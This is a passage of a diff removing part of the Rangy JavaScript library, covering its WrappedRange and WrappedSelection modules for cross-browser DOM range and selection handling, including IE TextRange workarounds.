- r1.endContainer === r2.endContainer &&
- r1.endOffset === r2.endOffset;
- };
-
- api.DomRange = Range;
- api.RangeException = RangeException;
-});rangy.createModule("WrappedRange", function(api, module) {
- api.requireModules( ["DomUtil", "DomRange"] );
-
- /**
- * @constructor
- */
- var WrappedRange;
- var dom = api.dom;
- var DomPosition = dom.DomPosition;
- var DomRange = api.DomRange;
-
-
-
- /*----------------------------------------------------------------------------------------------------------------*/
-
- /*
- This is a workaround for a bug where IE returns the wrong container element from the TextRange's parentElement()
- method. For example, in the following (where pipes denote the selection boundaries):
-
-
| a
b |
-
- var range = document.selection.createRange();
- alert(range.parentElement().id); // Should alert "ul" but alerts "b"
-
- This method returns the common ancestor node of the following:
- - the parentElement() of the textRange
- - the parentElement() of the textRange after calling collapse(true)
- - the parentElement() of the textRange after calling collapse(false)
- */
- function getTextRangeContainerElement(textRange) {
- var parentEl = textRange.parentElement();
-
- var range = textRange.duplicate();
- range.collapse(true);
- var startEl = range.parentElement();
- range = textRange.duplicate();
- range.collapse(false);
- var endEl = range.parentElement();
- var startEndContainer = (startEl == endEl) ? startEl : dom.getCommonAncestor(startEl, endEl);
-
- return startEndContainer == parentEl ? startEndContainer : dom.getCommonAncestor(parentEl, startEndContainer);
- }
-
- function textRangeIsCollapsed(textRange) {
- return textRange.compareEndPoints("StartToEnd", textRange) == 0;
- }
-
- // Gets the boundary of a TextRange expressed as a node and an offset within that node. This function started out as
- // an improved version of code found in Tim Cameron Ryan's IERange (http://code.google.com/p/ierange/) but has
- // grown, fixing problems with line breaks in preformatted text, adding workaround for IE TextRange bugs, handling
- // for inputs and images, plus optimizations.
- function getTextRangeBoundaryPosition(textRange, wholeRangeContainerElement, isStart, isCollapsed) {
- var workingRange = textRange.duplicate();
-
- workingRange.collapse(isStart);
- var containerElement = workingRange.parentElement();
-
- // Sometimes collapsing a TextRange that's at the start of a text node can move it into the previous node, so
- // check for that
- // TODO: Find out when. Workaround for wholeRangeContainerElement may break this
- if (!dom.isAncestorOf(wholeRangeContainerElement, containerElement, true)) {
- containerElement = wholeRangeContainerElement;
-
- }
-
-
-
- // Deal with nodes that cannot "contain rich HTML markup". In practice, this means form inputs, images and
- // similar. See http://msdn.microsoft.com/en-us/library/aa703950%28VS.85%29.aspx
- if (!containerElement.canHaveHTML) {
- return new DomPosition(containerElement.parentNode, dom.getNodeIndex(containerElement));
- }
-
- var workingNode = dom.getDocument(containerElement).createElement("span");
- var comparison, workingComparisonType = isStart ? "StartToStart" : "StartToEnd";
- var previousNode, nextNode, boundaryPosition, boundaryNode;
-
- // Move the working range through the container's children, starting at the end and working backwards, until the
- // working range reaches or goes past the boundary we're interested in
- do {
- containerElement.insertBefore(workingNode, workingNode.previousSibling);
- workingRange.moveToElementText(workingNode);
- } while ( (comparison = workingRange.compareEndPoints(workingComparisonType, textRange)) > 0 &&
- workingNode.previousSibling);
-
- // We've now reached or gone past the boundary of the text range we're interested in
- // so have identified the node we want
- boundaryNode = workingNode.nextSibling;
-
- if (comparison == -1 && boundaryNode && dom.isCharacterDataNode(boundaryNode)) {
- // This is a character data node (text, comment, cdata). The working range is collapsed at the start of the
- // node containing the text range's boundary, so we move the end of the working range to the boundary point
- // and measure the length of its text to get the boundary's offset within the node.
- workingRange.setEndPoint(isStart ? "EndToStart" : "EndToEnd", textRange);
-
-
- var offset;
-
- if (/[\r\n]/.test(boundaryNode.data)) {
- /*
- For the particular case of a boundary within a text node containing line breaks (within a
element,
- for example), we need a slightly complicated approach to get the boundary's offset in IE. The facts:
-
- - Each line break is represented as \r in the text node's data/nodeValue properties
- - Each line break is represented as \r\n in the TextRange's 'text' property
- - The 'text' property of the TextRange does not contain trailing line breaks
-
- To get round the problem presented by the final fact above, we can use the fact that TextRange's
- moveStart() and moveEnd() methods return the actual number of characters moved, which is not necessarily
- the same as the number of characters it was instructed to move. The simplest approach is to use this to
- store the characters moved when moving both the start and end of the range to the start of the document
- body and subtracting the start offset from the end offset (the "move-negative-gazillion" method).
- However, this is extremely slow when the document is large and the range is near the end of it. Clearly
- doing the mirror image (i.e. moving the range boundaries to the end of the document) has the same
- problem.
-
- Another approach that works is to use moveStart() to move the start boundary of the range up to the end
- boundary one character at a time and incrementing a counter with the value returned by the moveStart()
- call. However, the check for whether the start boundary has reached the end boundary is expensive, so
- this method is slow (although unlike "move-negative-gazillion" is largely unaffected by the location of
- the range within the document).
-
- The method below is a hybrid of the two methods above. It uses the fact that a string containing the
- TextRange's 'text' property with each \r\n converted to a single \r character cannot be longer than the
- text of the TextRange, so the start of the range is moved that length initially and then a character at
- a time to make up for any trailing line breaks not contained in the 'text' property. This has good
- performance in most situations compared to the previous two methods.
- */
- var tempRange = workingRange.duplicate();
- var rangeLength = tempRange.text.replace(/\r\n/g, "\r").length;
-
- offset = tempRange.moveStart("character", rangeLength);
- while ( (comparison = tempRange.compareEndPoints("StartToEnd", tempRange)) == -1) {
- offset++;
- tempRange.moveStart("character", 1);
- }
- } else {
- offset = workingRange.text.length;
- }
- boundaryPosition = new DomPosition(boundaryNode, offset);
- } else {
-
-
- // If the boundary immediately follows a character data node and this is the end boundary, we should favour
- // a position within that, and likewise for a start boundary preceding a character data node
- previousNode = (isCollapsed || !isStart) && workingNode.previousSibling;
- nextNode = (isCollapsed || isStart) && workingNode.nextSibling;
-
-
-
- if (nextNode && dom.isCharacterDataNode(nextNode)) {
- boundaryPosition = new DomPosition(nextNode, 0);
- } else if (previousNode && dom.isCharacterDataNode(previousNode)) {
- boundaryPosition = new DomPosition(previousNode, previousNode.length);
- } else {
- boundaryPosition = new DomPosition(containerElement, dom.getNodeIndex(workingNode));
- }
- }
-
- // Clean up
- workingNode.parentNode.removeChild(workingNode);
-
- return boundaryPosition;
- }
-
- // Returns a TextRange representing the boundary of a TextRange expressed as a node and an offset within that node.
- // This function started out as an optimized version of code found in Tim Cameron Ryan's IERange
- // (http://code.google.com/p/ierange/)
- function createBoundaryTextRange(boundaryPosition, isStart) {
- var boundaryNode, boundaryParent, boundaryOffset = boundaryPosition.offset;
- var doc = dom.getDocument(boundaryPosition.node);
- var workingNode, childNodes, workingRange = doc.body.createTextRange();
- var nodeIsDataNode = dom.isCharacterDataNode(boundaryPosition.node);
-
- if (nodeIsDataNode) {
- boundaryNode = boundaryPosition.node;
- boundaryParent = boundaryNode.parentNode;
- } else {
- childNodes = boundaryPosition.node.childNodes;
- boundaryNode = (boundaryOffset < childNodes.length) ? childNodes[boundaryOffset] : null;
- boundaryParent = boundaryPosition.node;
- }
-
- // Position the range immediately before the node containing the boundary
- workingNode = doc.createElement("span");
-
- // Making the working element non-empty element persuades IE to consider the TextRange boundary to be within the
- // element rather than immediately before or after it, which is what we want
- workingNode.innerHTML = "&#feff;";
-
- // insertBefore is supposed to work like appendChild if the second parameter is null. However, a bug report
- // for IERange suggests that it can crash the browser: http://code.google.com/p/ierange/issues/detail?id=12
- if (boundaryNode) {
- boundaryParent.insertBefore(workingNode, boundaryNode);
- } else {
- boundaryParent.appendChild(workingNode);
- }
-
- workingRange.moveToElementText(workingNode);
- workingRange.collapse(!isStart);
-
- // Clean up
- boundaryParent.removeChild(workingNode);
-
- // Move the working range to the text offset, if required
- if (nodeIsDataNode) {
- workingRange[isStart ? "moveStart" : "moveEnd"]("character", boundaryOffset);
- }
-
- return workingRange;
- }
-
- /*----------------------------------------------------------------------------------------------------------------*/
-
- if (api.features.implementsDomRange && (!api.features.implementsTextRange || !api.config.preferTextRange)) {
- // This is a wrapper around the browser's native DOM Range. It has two aims:
- // - Provide workarounds for specific browser bugs
- // - provide convenient extensions, which are inherited from Rangy's DomRange
-
- (function() {
- var rangeProto;
- var rangeProperties = DomRange.rangeProperties;
- var canSetRangeStartAfterEnd;
-
- function updateRangeProperties(range) {
- var i = rangeProperties.length, prop;
- while (i--) {
- prop = rangeProperties[i];
- range[prop] = range.nativeRange[prop];
- }
- }
-
- function updateNativeRange(range, startContainer, startOffset, endContainer,endOffset) {
- var startMoved = (range.startContainer !== startContainer || range.startOffset != startOffset);
- var endMoved = (range.endContainer !== endContainer || range.endOffset != endOffset);
-
- // Always set both boundaries for the benefit of IE9 (see issue 35)
- if (startMoved || endMoved) {
- range.setEnd(endContainer, endOffset);
- range.setStart(startContainer, startOffset);
- }
- }
-
- function detach(range) {
- range.nativeRange.detach();
- range.detached = true;
- var i = rangeProperties.length, prop;
- while (i--) {
- prop = rangeProperties[i];
- range[prop] = null;
- }
- }
-
- var createBeforeAfterNodeSetter;
-
- WrappedRange = function(range) {
- if (!range) {
- throw new Error("Range must be specified");
- }
- this.nativeRange = range;
- updateRangeProperties(this);
- };
-
- DomRange.createPrototypeRange(WrappedRange, updateNativeRange, detach);
-
- rangeProto = WrappedRange.prototype;
-
- rangeProto.selectNode = function(node) {
- this.nativeRange.selectNode(node);
- updateRangeProperties(this);
- };
-
- rangeProto.deleteContents = function() {
- this.nativeRange.deleteContents();
- updateRangeProperties(this);
- };
-
- rangeProto.extractContents = function() {
- var frag = this.nativeRange.extractContents();
- updateRangeProperties(this);
- return frag;
- };
-
- rangeProto.cloneContents = function() {
- return this.nativeRange.cloneContents();
- };
-
- // TODO: Until I can find a way to programmatically trigger the Firefox bug (apparently long-standing, still
- // present in 3.6.8) that throws "Index or size is negative or greater than the allowed amount" for
- // insertNode in some circumstances, all browsers will have to use the Rangy's own implementation of
- // insertNode, which works but is almost certainly slower than the native implementation.
-/*
- rangeProto.insertNode = function(node) {
- this.nativeRange.insertNode(node);
- updateRangeProperties(this);
- };
-*/
-
- rangeProto.surroundContents = function(node) {
- this.nativeRange.surroundContents(node);
- updateRangeProperties(this);
- };
-
- rangeProto.collapse = function(isStart) {
- this.nativeRange.collapse(isStart);
- updateRangeProperties(this);
- };
-
- rangeProto.cloneRange = function() {
- return new WrappedRange(this.nativeRange.cloneRange());
- };
-
- rangeProto.refresh = function() {
- updateRangeProperties(this);
- };
-
- rangeProto.toString = function() {
- return this.nativeRange.toString();
- };
-
- // Create test range and node for feature detection
-
- var testTextNode = document.createTextNode("test");
- dom.getBody(document).appendChild(testTextNode);
- var range = document.createRange();
-
- /*--------------------------------------------------------------------------------------------------------*/
-
- // Test for Firefox 2 bug that prevents moving the start of a Range to a point after its current end and
- // correct for it
-
- range.setStart(testTextNode, 0);
- range.setEnd(testTextNode, 0);
-
- try {
- range.setStart(testTextNode, 1);
- canSetRangeStartAfterEnd = true;
-
- rangeProto.setStart = function(node, offset) {
- this.nativeRange.setStart(node, offset);
- updateRangeProperties(this);
- };
-
- rangeProto.setEnd = function(node, offset) {
- this.nativeRange.setEnd(node, offset);
- updateRangeProperties(this);
- };
-
- createBeforeAfterNodeSetter = function(name) {
- return function(node) {
- this.nativeRange[name](node);
- updateRangeProperties(this);
- };
- };
-
- } catch(ex) {
-
-
- canSetRangeStartAfterEnd = false;
-
- rangeProto.setStart = function(node, offset) {
- try {
- this.nativeRange.setStart(node, offset);
- } catch (ex) {
- this.nativeRange.setEnd(node, offset);
- this.nativeRange.setStart(node, offset);
- }
- updateRangeProperties(this);
- };
-
- rangeProto.setEnd = function(node, offset) {
- try {
- this.nativeRange.setEnd(node, offset);
- } catch (ex) {
- this.nativeRange.setStart(node, offset);
- this.nativeRange.setEnd(node, offset);
- }
- updateRangeProperties(this);
- };
-
- createBeforeAfterNodeSetter = function(name, oppositeName) {
- return function(node) {
- try {
- this.nativeRange[name](node);
- } catch (ex) {
- this.nativeRange[oppositeName](node);
- this.nativeRange[name](node);
- }
- updateRangeProperties(this);
- };
- };
- }
-
- rangeProto.setStartBefore = createBeforeAfterNodeSetter("setStartBefore", "setEndBefore");
- rangeProto.setStartAfter = createBeforeAfterNodeSetter("setStartAfter", "setEndAfter");
- rangeProto.setEndBefore = createBeforeAfterNodeSetter("setEndBefore", "setStartBefore");
- rangeProto.setEndAfter = createBeforeAfterNodeSetter("setEndAfter", "setStartAfter");
-
- /*--------------------------------------------------------------------------------------------------------*/
-
- // Test for and correct Firefox 2 behaviour with selectNodeContents on text nodes: it collapses the range to
- // the 0th character of the text node
- range.selectNodeContents(testTextNode);
- if (range.startContainer == testTextNode && range.endContainer == testTextNode &&
- range.startOffset == 0 && range.endOffset == testTextNode.length) {
- rangeProto.selectNodeContents = function(node) {
- this.nativeRange.selectNodeContents(node);
- updateRangeProperties(this);
- };
- } else {
- rangeProto.selectNodeContents = function(node) {
- this.setStart(node, 0);
- this.setEnd(node, DomRange.getEndOffset(node));
- };
- }
-
- /*--------------------------------------------------------------------------------------------------------*/
-
- // Test for WebKit bug that has the beahviour of compareBoundaryPoints round the wrong way for constants
- // START_TO_END and END_TO_START: https://bugs.webkit.org/show_bug.cgi?id=20738
-
- range.selectNodeContents(testTextNode);
- range.setEnd(testTextNode, 3);
-
- var range2 = document.createRange();
- range2.selectNodeContents(testTextNode);
- range2.setEnd(testTextNode, 4);
- range2.setStart(testTextNode, 2);
-
- if (range.compareBoundaryPoints(range.START_TO_END, range2) == -1 &
- range.compareBoundaryPoints(range.END_TO_START, range2) == 1) {
- // This is the wrong way round, so correct for it
-
-
- rangeProto.compareBoundaryPoints = function(type, range) {
- range = range.nativeRange || range;
- if (type == range.START_TO_END) {
- type = range.END_TO_START;
- } else if (type == range.END_TO_START) {
- type = range.START_TO_END;
- }
- return this.nativeRange.compareBoundaryPoints(type, range);
- };
- } else {
- rangeProto.compareBoundaryPoints = function(type, range) {
- return this.nativeRange.compareBoundaryPoints(type, range.nativeRange || range);
- };
- }
-
- /*--------------------------------------------------------------------------------------------------------*/
-
- // Test for existence of createContextualFragment and delegate to it if it exists
- if (api.util.isHostMethod(range, "createContextualFragment")) {
- rangeProto.createContextualFragment = function(fragmentStr) {
- return this.nativeRange.createContextualFragment(fragmentStr);
- };
- }
-
- /*--------------------------------------------------------------------------------------------------------*/
-
- // Clean up
- dom.getBody(document).removeChild(testTextNode);
- range.detach();
- range2.detach();
- })();
-
- api.createNativeRange = function(doc) {
- doc = doc || document;
- return doc.createRange();
- };
- } else if (api.features.implementsTextRange) {
- // This is a wrapper around a TextRange, providing full DOM Range functionality using rangy's DomRange as a
- // prototype
-
- WrappedRange = function(textRange) {
- this.textRange = textRange;
- this.refresh();
- };
-
- WrappedRange.prototype = new DomRange(document);
-
- WrappedRange.prototype.refresh = function() {
- var start, end;
-
- // TextRange's parentElement() method cannot be trusted. getTextRangeContainerElement() works around that.
- var rangeContainerElement = getTextRangeContainerElement(this.textRange);
-
- if (textRangeIsCollapsed(this.textRange)) {
- end = start = getTextRangeBoundaryPosition(this.textRange, rangeContainerElement, true, true);
- } else {
-
- start = getTextRangeBoundaryPosition(this.textRange, rangeContainerElement, true, false);
- end = getTextRangeBoundaryPosition(this.textRange, rangeContainerElement, false, false);
- }
-
- this.setStart(start.node, start.offset);
- this.setEnd(end.node, end.offset);
- };
-
- DomRange.copyComparisonConstants(WrappedRange);
-
- // Add WrappedRange as the Range property of the global object to allow expression like Range.END_TO_END to work
- var globalObj = (function() { return this; })();
- if (typeof globalObj.Range == "undefined") {
- globalObj.Range = WrappedRange;
- }
-
- api.createNativeRange = function(doc) {
- doc = doc || document;
- return doc.body.createTextRange();
- };
- }
-
- if (api.features.implementsTextRange) {
- WrappedRange.rangeToTextRange = function(range) {
- if (range.collapsed) {
- var tr = createBoundaryTextRange(new DomPosition(range.startContainer, range.startOffset), true);
-
-
-
- return tr;
-
- //return createBoundaryTextRange(new DomPosition(range.startContainer, range.startOffset), true);
- } else {
- var startRange = createBoundaryTextRange(new DomPosition(range.startContainer, range.startOffset), true);
- var endRange = createBoundaryTextRange(new DomPosition(range.endContainer, range.endOffset), false);
- var textRange = dom.getDocument(range.startContainer).body.createTextRange();
- textRange.setEndPoint("StartToStart", startRange);
- textRange.setEndPoint("EndToEnd", endRange);
- return textRange;
- }
- };
- }
-
- WrappedRange.prototype.getName = function() {
- return "WrappedRange";
- };
-
- api.WrappedRange = WrappedRange;
-
- api.createRange = function(doc) {
- doc = doc || document;
- return new WrappedRange(api.createNativeRange(doc));
- };
-
- api.createRangyRange = function(doc) {
- doc = doc || document;
- return new DomRange(doc);
- };
-
- api.createIframeRange = function(iframeEl) {
- return api.createRange(dom.getIframeDocument(iframeEl));
- };
-
- api.createIframeRangyRange = function(iframeEl) {
- return api.createRangyRange(dom.getIframeDocument(iframeEl));
- };
-
- api.addCreateMissingNativeApiListener(function(win) {
- var doc = win.document;
- if (typeof doc.createRange == "undefined") {
- doc.createRange = function() {
- return api.createRange(this);
- };
- }
- doc = win = null;
- });
-});rangy.createModule("WrappedSelection", function(api, module) {
- // This will create a selection object wrapper that follows the Selection object found in the WHATWG draft DOM Range
- // spec (http://html5.org/specs/dom-range.html)
-
- api.requireModules( ["DomUtil", "DomRange", "WrappedRange"] );
-
- api.config.checkSelectionRanges = true;
-
- var BOOLEAN = "boolean",
- windowPropertyName = "_rangySelection",
- dom = api.dom,
- util = api.util,
- DomRange = api.DomRange,
- WrappedRange = api.WrappedRange,
- DOMException = api.DOMException,
- DomPosition = dom.DomPosition,
- getSelection,
- selectionIsCollapsed,
- CONTROL = "Control";
-
-
-
- function getWinSelection(winParam) {
- return (winParam || window).getSelection();
- }
-
- function getDocSelection(winParam) {
- return (winParam || window).document.selection;
- }
-
- // Test for the Range/TextRange and Selection features required
- // Test for ability to retrieve selection
- var implementsWinGetSelection = api.util.isHostMethod(window, "getSelection"),
- implementsDocSelection = api.util.isHostObject(document, "selection");
-
- var useDocumentSelection = implementsDocSelection && (!implementsWinGetSelection || api.config.preferTextRange);
-
- if (useDocumentSelection) {
- getSelection = getDocSelection;
- api.isSelectionValid = function(winParam) {
- var doc = (winParam || window).document, nativeSel = doc.selection;
-
- // Check whether the selection TextRange is actually contained within the correct document
- return (nativeSel.type != "None" || dom.getDocument(nativeSel.createRange().parentElement()) == doc);
- };
- } else if (implementsWinGetSelection) {
- getSelection = getWinSelection;
- api.isSelectionValid = function() {
- return true;
- };
- } else {
- module.fail("Neither document.selection or window.getSelection() detected.");
- }
-
- api.getNativeSelection = getSelection;
-
- var testSelection = getSelection();
- var testRange = api.createNativeRange(document);
- var body = dom.getBody(document);
-
- // Obtaining a range from a selection
- var selectionHasAnchorAndFocus = util.areHostObjects(testSelection, ["anchorNode", "focusNode"] &&
- util.areHostProperties(testSelection, ["anchorOffset", "focusOffset"]));
- api.features.selectionHasAnchorAndFocus = selectionHasAnchorAndFocus;
-
- // Test for existence of native selection extend() method
- var selectionHasExtend = util.isHostMethod(testSelection, "extend");
- api.features.selectionHasExtend = selectionHasExtend;
-
- // Test if rangeCount exists
- var selectionHasRangeCount = (typeof testSelection.rangeCount == "number");
- api.features.selectionHasRangeCount = selectionHasRangeCount;
-
- var selectionSupportsMultipleRanges = false;
- var collapsedNonEditableSelectionsSupported = true;
-
- if (util.areHostMethods(testSelection, ["addRange", "getRangeAt", "removeAllRanges"]) &&
- typeof testSelection.rangeCount == "number" && api.features.implementsDomRange) {
-
- (function() {
- var iframe = document.createElement("iframe");
- body.appendChild(iframe);
-
- var iframeDoc = dom.getIframeDocument(iframe);
- iframeDoc.open();
- iframeDoc.write("12");
- iframeDoc.close();
-
- var sel = dom.getIframeWindow(iframe).getSelection();
- var docEl = iframeDoc.documentElement;
- var iframeBody = docEl.lastChild, textNode = iframeBody.firstChild;
-
- // Test whether the native selection will allow a collapsed selection within a non-editable element
- var r1 = iframeDoc.createRange();
- r1.setStart(textNode, 1);
- r1.collapse(true);
- sel.addRange(r1);
- collapsedNonEditableSelectionsSupported = (sel.rangeCount == 1);
- sel.removeAllRanges();
-
- // Test whether the native selection is capable of supporting multiple ranges
- var r2 = r1.cloneRange();
- r1.setStart(textNode, 0);
- r2.setEnd(textNode, 2);
- sel.addRange(r1);
- sel.addRange(r2);
-
- selectionSupportsMultipleRanges = (sel.rangeCount == 2);
-
- // Clean up
- r1.detach();
- r2.detach();
-
- body.removeChild(iframe);
- })();
- }
-
- api.features.selectionSupportsMultipleRanges = selectionSupportsMultipleRanges;
- api.features.collapsedNonEditableSelectionsSupported = collapsedNonEditableSelectionsSupported;
-
- // ControlRanges
- var implementsControlRange = false, testControlRange;
-
- if (body && util.isHostMethod(body, "createControlRange")) {
- testControlRange = body.createControlRange();
- if (util.areHostProperties(testControlRange, ["item", "add"])) {
- implementsControlRange = true;
- }
- }
- api.features.implementsControlRange = implementsControlRange;
-
- // Selection collapsedness
- if (selectionHasAnchorAndFocus) {
- selectionIsCollapsed = function(sel) {
- return sel.anchorNode === sel.focusNode && sel.anchorOffset === sel.focusOffset;
- };
- } else {
- selectionIsCollapsed = function(sel) {
- return sel.rangeCount ? sel.getRangeAt(sel.rangeCount - 1).collapsed : false;
- };
- }
-
- function updateAnchorAndFocusFromRange(sel, range, backwards) {
- var anchorPrefix = backwards ? "end" : "start", focusPrefix = backwards ? "start" : "end";
- sel.anchorNode = range[anchorPrefix + "Container"];
- sel.anchorOffset = range[anchorPrefix + "Offset"];
- sel.focusNode = range[focusPrefix + "Container"];
- sel.focusOffset = range[focusPrefix + "Offset"];
- }
-
- function updateAnchorAndFocusFromNativeSelection(sel) {
- var nativeSel = sel.nativeSelection;
- sel.anchorNode = nativeSel.anchorNode;
- sel.anchorOffset = nativeSel.anchorOffset;
- sel.focusNode = nativeSel.focusNode;
- sel.focusOffset = nativeSel.focusOffset;
- }
-
- function updateEmptySelection(sel) {
- sel.anchorNode = sel.focusNode = null;
- sel.anchorOffset = sel.focusOffset = 0;
- sel.rangeCount = 0;
- sel.isCollapsed = true;
- sel._ranges.length = 0;
- }
-
- function getNativeRange(range) {
- var nativeRange;
- if (range instanceof DomRange) {
- nativeRange = range._selectionNativeRange;
- if (!nativeRange) {
- nativeRange = api.createNativeRange(dom.getDocument(range.startContainer));
- nativeRange.setEnd(range.endContainer, range.endOffset);
- nativeRange.setStart(range.startContainer, range.startOffset);
- range._selectionNativeRange = nativeRange;
- range.attachListener("detach", function() {
-
- this._selectionNativeRange = null;
- });
- }
- } else if (range instanceof WrappedRange) {
- nativeRange = range.nativeRange;
- } else if (api.features.implementsDomRange && (range instanceof dom.getWindow(range.startContainer).Range)) {
- nativeRange = range;
- }
- return nativeRange;
- }
-
- function rangeContainsSingleElement(rangeNodes) {
- if (!rangeNodes.length || rangeNodes[0].nodeType != 1) {
- return false;
- }
- for (var i = 1, len = rangeNodes.length; i < len; ++i) {
- if (!dom.isAncestorOf(rangeNodes[0], rangeNodes[i])) {
- return false;
- }
- }
- return true;
- }
-
- function getSingleElementFromRange(range) {
- var nodes = range.getNodes();
- if (!rangeContainsSingleElement(nodes)) {
- throw new Error("getSingleElementFromRange: range " + range.inspect() + " did not consist of a single element");
- }
- return nodes[0];
- }
-
- function isTextRange(range) {
- return !!range && typeof range.text != "undefined";
- }
-
- function updateFromTextRange(sel, range) {
- // Create a Range from the selected TextRange
- var wrappedRange = new WrappedRange(range);
- sel._ranges = [wrappedRange];
-
- updateAnchorAndFocusFromRange(sel, wrappedRange, false);
- sel.rangeCount = 1;
- sel.isCollapsed = wrappedRange.collapsed;
- }
-
- function updateControlSelection(sel) {
- // Update the wrapped selection based on what's now in the native selection
- sel._ranges.length = 0;
- if (sel.docSelection.type == "None") {
- updateEmptySelection(sel);
- } else {
- var controlRange = sel.docSelection.createRange();
- if (isTextRange(controlRange)) {
- // This case (where the selection type is "Control" and calling createRange() on the selection returns
- // a TextRange) can happen in IE 9. It happens, for example, when all elements in the selected
- // ControlRange have been removed from the ControlRange and removed from the document.
- updateFromTextRange(sel, controlRange);
- } else {
- sel.rangeCount = controlRange.length;
- var range, doc = dom.getDocument(controlRange.item(0));
- for (var i = 0; i < sel.rangeCount; ++i) {
- range = api.createRange(doc);
- range.selectNode(controlRange.item(i));
- sel._ranges.push(range);
- }
- sel.isCollapsed = sel.rangeCount == 1 && sel._ranges[0].collapsed;
- updateAnchorAndFocusFromRange(sel, sel._ranges[sel.rangeCount - 1], false);
- }
- }
- }
-
- function addRangeToControlSelection(sel, range) {
- var controlRange = sel.docSelection.createRange();
- var rangeElement = getSingleElementFromRange(range);
-
- // Create a new ControlRange containing all the elements in the selected ControlRange plus the element
- // contained by the supplied range
- var doc = dom.getDocument(controlRange.item(0));
- var newControlRange = dom.getBody(doc).createControlRange();
- for (var i = 0, len = controlRange.length; i < len; ++i) {
- newControlRange.add(controlRange.item(i));
- }
- try {
- newControlRange.add(rangeElement);
- } catch (ex) {
- throw new Error("addRange(): Element within the specified Range could not be added to control selection (does it have layout?)");
- }
- newControlRange.select();
-
- // Update the wrapped selection based on what's now in the native selection
- updateControlSelection(sel);
- }
-
- var getSelectionRangeAt;
-
- if (util.isHostMethod(testSelection, "getRangeAt")) {
- getSelectionRangeAt = function(sel, index) {
- try {
- return sel.getRangeAt(index);
- } catch(ex) {
- return null;
- }
- };
- } else if (selectionHasAnchorAndFocus) {
- getSelectionRangeAt = function(sel) {
- var doc = dom.getDocument(sel.anchorNode);
- var range = api.createRange(doc);
- range.setStart(sel.anchorNode, sel.anchorOffset);
- range.setEnd(sel.focusNode, sel.focusOffset);
-
- // Handle the case when the selection was selected backwards (from the end to the start in the
- // document)
- if (range.collapsed !== this.isCollapsed) {
- range.setStart(sel.focusNode, sel.focusOffset);
- range.setEnd(sel.anchorNode, sel.anchorOffset);
- }
-
- return range;
- };
- }
-
- /**
- * @constructor
- */
- function WrappedSelection(selection, docSelection, win) {
- this.nativeSelection = selection;
- this.docSelection = docSelection;
- this._ranges = [];
- this.win = win;
- this.refresh();
- }
-
- api.getSelection = function(win) {
- win = win || window;
- var sel = win[windowPropertyName];
- var nativeSel = getSelection(win), docSel = implementsDocSelection ? getDocSelection(win) : null;
- if (sel) {
- sel.nativeSelection = nativeSel;
- sel.docSelection = docSel;
- sel.refresh(win);
- } else {
- sel = new WrappedSelection(nativeSel, docSel, win);
- win[windowPropertyName] = sel;
- }
- return sel;
- };
-
- api.getIframeSelection = function(iframeEl) {
- return api.getSelection(dom.getIframeWindow(iframeEl));
- };
-
- var selProto = WrappedSelection.prototype;
-
- function createControlSelection(sel, ranges) {
- // Ensure that the selection becomes of type "Control"
- var doc = dom.getDocument(ranges[0].startContainer);
- var controlRange = dom.getBody(doc).createControlRange();
- for (var i = 0, el; i < rangeCount; ++i) {
- el = getSingleElementFromRange(ranges[i]);
- try {
- controlRange.add(el);
- } catch (ex) {
- throw new Error("setRanges(): Element within the one of the specified Ranges could not be added to control selection (does it have layout?)");
- }
- }
- controlRange.select();
-
- // Update the wrapped selection based on what's now in the native selection
- updateControlSelection(sel);
- }
-
- // Selecting a range
- if (!useDocumentSelection && selectionHasAnchorAndFocus && util.areHostMethods(testSelection, ["removeAllRanges", "addRange"])) {
- selProto.removeAllRanges = function() {
- this.nativeSelection.removeAllRanges();
- updateEmptySelection(this);
- };
-
- var addRangeBackwards = function(sel, range) {
- var doc = DomRange.getRangeDocument(range);
- var endRange = api.createRange(doc);
- endRange.collapseToPoint(range.endContainer, range.endOffset);
- sel.nativeSelection.addRange(getNativeRange(endRange));
- sel.nativeSelection.extend(range.startContainer, range.startOffset);
- sel.refresh();
- };
-
- if (selectionHasRangeCount) {
- selProto.addRange = function(range, backwards) {
- if (implementsControlRange && implementsDocSelection && this.docSelection.type == CONTROL) {
- addRangeToControlSelection(this, range);
- } else {
- if (backwards && selectionHasExtend) {
- addRangeBackwards(this, range);
- } else {
- var previousRangeCount;
- if (selectionSupportsMultipleRanges) {
- previousRangeCount = this.rangeCount;
- } else {
- this.removeAllRanges();
- previousRangeCount = 0;
- }
- this.nativeSelection.addRange(getNativeRange(range));
-
- // Check whether adding the range was successful
- this.rangeCount = this.nativeSelection.rangeCount;
-
- if (this.rangeCount == previousRangeCount + 1) {
- // The range was added successfully
-
- // Check whether the range that we added to the selection is reflected in the last range extracted from
- // the selection
- if (api.config.checkSelectionRanges) {
- var nativeRange = getSelectionRangeAt(this.nativeSelection, this.rangeCount - 1);
- if (nativeRange && !DomRange.rangesEqual(nativeRange, range)) {
- // Happens in WebKit with, for example, a selection placed at the start of a text node
- range = new WrappedRange(nativeRange);
- }
- }
- this._ranges[this.rangeCount - 1] = range;
- updateAnchorAndFocusFromRange(this, range, selectionIsBackwards(this.nativeSelection));
- this.isCollapsed = selectionIsCollapsed(this);
- } else {
- // The range was not added successfully. The simplest thing is to refresh
- this.refresh();
- }
- }
- }
- };
- } else {
- selProto.addRange = function(range, backwards) {
- if (backwards && selectionHasExtend) {
- addRangeBackwards(this, range);
- } else {
- this.nativeSelection.addRange(getNativeRange(range));
- this.refresh();
- }
- };
- }
-
- selProto.setRanges = function(ranges) {
- if (implementsControlRange && ranges.length > 1) {
- createControlSelection(this, ranges);
- } else {
- this.removeAllRanges();
- for (var i = 0, len = ranges.length; i < len; ++i) {
- this.addRange(ranges[i]);
- }
- }
- };
- } else if (util.isHostMethod(testSelection, "empty") && util.isHostMethod(testRange, "select") &&
- implementsControlRange && useDocumentSelection) {
-
- selProto.removeAllRanges = function() {
- // Added try/catch as fix for issue #21
- try {
- this.docSelection.empty();
-
- // Check for empty() not working (issue #24)
- if (this.docSelection.type != "None") {
- // Work around failure to empty a control selection by instead selecting a TextRange and then
- // calling empty()
- var doc;
- if (this.anchorNode) {
- doc = dom.getDocument(this.anchorNode);
- } else if (this.docSelection.type == CONTROL) {
- var controlRange = this.docSelection.createRange();
- if (controlRange.length) {
- doc = dom.getDocument(controlRange.item(0)).body.createTextRange();
- }
- }
- if (doc) {
- var textRange = doc.body.createTextRange();
- textRange.select();
- this.docSelection.empty();
- }
- }
- } catch(ex) {}
- updateEmptySelection(this);
- };
-
- selProto.addRange = function(range) {
- if (this.docSelection.type == CONTROL) {
- addRangeToControlSelection(this, range);
- } else {
- WrappedRange.rangeToTextRange(range).select();
- this._ranges[0] = range;
